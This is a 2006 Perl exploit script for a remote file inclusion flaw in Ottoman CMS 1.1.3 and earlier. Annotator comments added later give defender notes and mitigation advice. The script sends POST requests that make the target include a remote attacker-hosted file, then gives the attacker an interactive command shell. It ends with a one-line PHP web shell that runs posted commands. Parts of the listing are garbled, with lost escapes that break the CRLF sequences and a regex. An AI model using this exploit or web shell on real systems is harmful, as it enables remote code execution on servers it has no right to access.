
# Title : Ottoman CMS <= 1.1.3 (default_path) Remote File Inclusion Exploit
# Published : 2006-07-09
# Author : Jacek Wlodarczyk


#!/usr/bin/perl
use IO::Socket;


################################################################################
#                                                                              #
#         Jacek Wlodarczyk (j4ck) - jacekwlo[at]gmail[dot]com                  #
#                                                                              #
################################################################################




#Title:       Ottoman CMS <= 1.1.3 Remote File Inclusion Exploit
#Application: Ottoman Content Management System
#Version:     1.1.3 and prior
#Url:         http://www.lowter.com/p/ottoman



#Affected software description:

#Input passed to the "default_path" parameter in "index.php", "error.php", "classes/main_class.php", "format_css.php", "js.php",
#and "rss.php" is not properly sanitized before being used to include files.
#The vulnerable scripts do not properly sanitize user-supplied input from the 'POST' and 'COOKIE' variables.
#This can be exploited to execute arbitrary PHP code by including files from local or external resources.
#Exploitation requires "register_globals" to be turned ON.

#PoC Exploit (POST method):



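# Require exactly four positional arguments, otherwise print help and exit.
# Numeric `!=` replaces the original string compare (`ne`) of an array in
# scalar context, and a plain call replaces the legacy `&usage` form, which
# would also hand the caller's current @_ to the sub.
usage() if @ARGV != 4;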


# Print the command-line help text and terminate the process.
# Every line is emitted verbatim (only $0 interpolates); the empty
# prototype is kept because call sites may depend on it.
sub usage()
{
  my @help_lines = (
    "rn (c) Jacek Wlodarczyk (j4ck)rnrn",
    "- Exploit for Ottoman CMS <= 1.1.3rnrn",
    "- Usage: $0 <target> <script location> <shell location> <shell variable>rn",
    "- <target>             -> Victim's target eg: http://www.victim.comrn",
    "- <script location>    -> Path to script  eg: /ottoman/error.phprn",
    "- <cmd shell location> -> eg: http://www.site.com/sh_dir/rn",
    "- <cmd shell variable> -> eg: cmdrnrn",
    "- Eg: http://127.0.0.1 /ottoman_v1.1.3/index.php http://10.0.0.10/sh_dir/ cmdrnrn",
  );
  print $_ for @help_lines;
  exit();
}




# ---------------------------------------------------------------------------
# Main body of the 2006 PoC. From a defender's view the whole script is one
# fact: the application builds an include path from a request-supplied
# "default_path" value, so any request whose body or cookie carries that
# field with an external URL is the thing to look for in logs. Mitigation
# on the application side is to never derive include paths from request
# data (use a fixed allow-list); the page itself notes the PoC needs
# register_globals ON, and remote includes also presumably depend on the
# PHP remote-include settings (allow_url_include / allow_url_fopen) — verify
# against the PHP version in use. The script runs without `use strict` or
# `use warnings`; all variables below are package globals.
# ---------------------------------------------------------------------------
$HOST     = $ARGV[0];   # target base URL; the "http://" prefix is stripped below
$DIR      = $ARGV[1];   # request target (path of the script being posted to)
$INC_FILE = $ARGV[2];   # value placed into the "default_path" form field
$CMD      = $ARGV[3];   # name of the second form field
$COMMAND  = '';         # per-iteration value read from STDIN

print "rnATTACKING : ".$HOST.$DIR."rnrn";
# NOTE(review): the pattern contains unescaped slashes, so as written this
# line does not parse as a substitution; the "\/\/" escapes were probably
# lost when the listing was extracted. Left untouched.
$HOST =~ s/(http://)//;


# Read-send-print loop: `while ()` with an empty condition never terminates
# on its own; the only exits are "q" on STDIN and the "404" check in the
# response reader below.
while()
  {

    print "[shell] $";
    chomp($COMMAND = <STDIN>);
    if ($COMMAND eq "q")
      {
        exit;
      }

    # An empty line (or "0") re-prompts instead of sending a request.
    if (!$COMMAND)
      {
        print "nPlease Enter a Commandnn";
        next;
      }


    # Form body: default_path=<arg 3>&<arg 4>=<stdin line>. No URL-encoding
    # is applied, so '&', '=' or '%' in the input go out raw.
    # Defender's note: "default_path" holding an absolute URL in a POST body
    # or cookie is the request-level signature of this issue.
    $data="default_path=".$INC_FILE."&".$CMD."=".$COMMAND;
    # Fresh TCP connection per command; port 80 is hard-coded (no TLS).
    # "Error 404" is misleading: this die fires on a failed connect, not on
    # an HTTP status.
    $post = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "Error 404rnrn";

    # Hand-built HTTP/1.1 request. The "rn" sequences look like CRLF escapes
    # whose backslashes were lost in extraction (left as-is). Note also two
    # contradictory Connection headers, and Content-Length counting $data
    # while the body line sends $data followed by an extra "rn".
    print $post "POST ".$DIR." HTTP/1.1rn";
    print $post "Host: ".$HOST."rn";
    print $post "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4rn";
    print $post "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5rn";
    print $post "Accept-Language: en-us;q=0.7,en;q=0.3rn";
    print $post "Accept-Encoding: gzip,deflatern";
    print $post "Connection: Keep-Alivern";
    print $post "Keep-Alive: 300rn";
    print $post "Cache-Control: no-cachern";
    print $post "Content-Type: application/x-www-form-urlencodedrn";
    print $post "Content-Length: ".length($data)."rn";
    print $post "Connection: closernrn";
    print $post $data."rn";





    # Response reader. Any line containing the substring "404" anywhere
    # (status line or page body) aborts the whole script, not just this
    # iteration. `printf $ans` uses the response line as the *format*
    # string, so a '%' in the body is interpreted as a conversion; the
    # plain `print $ans` form would avoid that. Socket is never closed
    # explicitly; it is dropped when $post is reassigned.
    while ($ans = <$post>)
      {
        if ($ans =~ /404/ )
          {
            printf "nnFile ".$ARGV[1]." no exists.rnrn";
            exit;
          }
        printf $ans;
      }

  }
exit;


#Shell example:

#config.php
#------cut---------------
#<?
#passthru($_POST['cmd']);
#?>
#------cut---------------
